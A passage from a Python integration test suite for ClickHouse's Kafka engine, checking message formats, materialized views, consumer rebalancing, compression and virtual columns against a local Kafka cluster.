cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
# logging.debug("kafka is available - running test")
yield # run test
# Tests
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "consumer_hang"
kafka_create_topic(admin_client, topic_name, num_partitions=8)
instance.query(f'''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger heartbeat fail,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# logging.debug("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# so it was waiting forever while the application will execute queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
# cleanup unread messages so kafka will not wait reading consumers to delete topic
instance.query(f'''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
''')
num_read = int(instance.query('SELECT count() FROM test.kafka'))
logging.debug(f"read {num_read} from {topic_name} before delete")
instance.query('DROP TABLE test.kafka')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "consumer_hang2"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# first consumer subscribe the topic, try to poll some data, and go to rest
instance.query('SELECT * FROM test.kafka')
# second consumer do the same leading to rebalance in the first
# consumer, try to poll some data
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# first consumer has pending rebalance callback unprocessed (no poll after select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
kafka_delete_topic(admin_client, topic_name)
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce(kafka_cluster, 'tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "empty"
kafka_create_topic(admin_client, topic_name)
instance.query(f'''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
kafka_delete_topic(admin_client, topic_name)
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_recreate_kafka_table(kafka_cluster):
'''
Checks that materialized view work properly after dropping and recreating the Kafka table.
'''
# line for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "recreate_kafka_table"
kafka_create_topic(admin_client, topic_name, num_partitions=6)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(120):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
instance.query('''
DROP TABLE test.kafka;
''')
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
''')
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.view")) == 240
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, topic_name)
def test_librdkafka_compression(kafka_cluster):
"""
Regression for UB in snappy-c (that is used in librdkafka),
backport pr is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27. DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
To trigger this regression there should duplicated messages
Orignal reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
logging.debug(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
kafka_create_topic(admin_client, topic_name, config={'compression.type': compression_type})
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(kafka_cluster, topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batchs of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce(kafka_cluster, 'flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'virt2', messages, 0)
sql = 'SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view ORDER BY kafka_key'
result = instance.query(sql)
iterations = 0
while not kafka_check_result(result, False, 'test_kafka_virtual2.reference') and iterations < 10:
time.sleep(3)
iterations += 1
result = instance.query(sql)
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
kafka_create_topic(admin_client, "virt2_0", num_partitions=2)
kafka_create_topic(admin_client, "virt2_1", num_partitions=2)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)
members = describe_consumer_group(kafka_cluster, 'virt2')
# pprint.pprint(members)
members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
kafka_delete_topic(admin_client, "virt2_0")
kafka_delete_topic(admin_client, "virt2_1")
